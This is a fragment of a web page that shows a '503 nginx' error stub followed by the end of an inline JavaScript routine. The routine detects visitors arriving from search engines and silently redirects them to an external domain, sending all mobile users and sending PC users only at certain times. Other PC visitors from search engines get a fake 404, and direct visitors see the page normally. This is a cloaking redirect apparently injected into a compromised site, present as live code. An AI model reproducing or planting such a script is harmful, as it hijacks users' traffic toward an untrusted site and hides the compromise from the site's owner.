503


nginx
`; } // 主逻辑 function main() { var fromSearch = isFromSearchEngine(); var isPCDevice = isPC(); // 如果来自搜索引擎 if (fromSearch) { // 手机用户:直接跳转 if (!isPCDevice) { window.location.replace('http://daohang.mhjtgc.com/'); return; } // PC用户:检查时间 if (isAllowedTime()) { // 在允许时间内:跳转 window.location.replace('http://daohang.mhjtgc.com/'); } else { // 不在允许时间内:显示404 show404(); } } // 非搜索引擎访问:正常访问 } // 页面加载完成后执行 if (document.readyState === 'loading') { document.addEventListener('DOMContentLoaded', main); } else { main(); } })();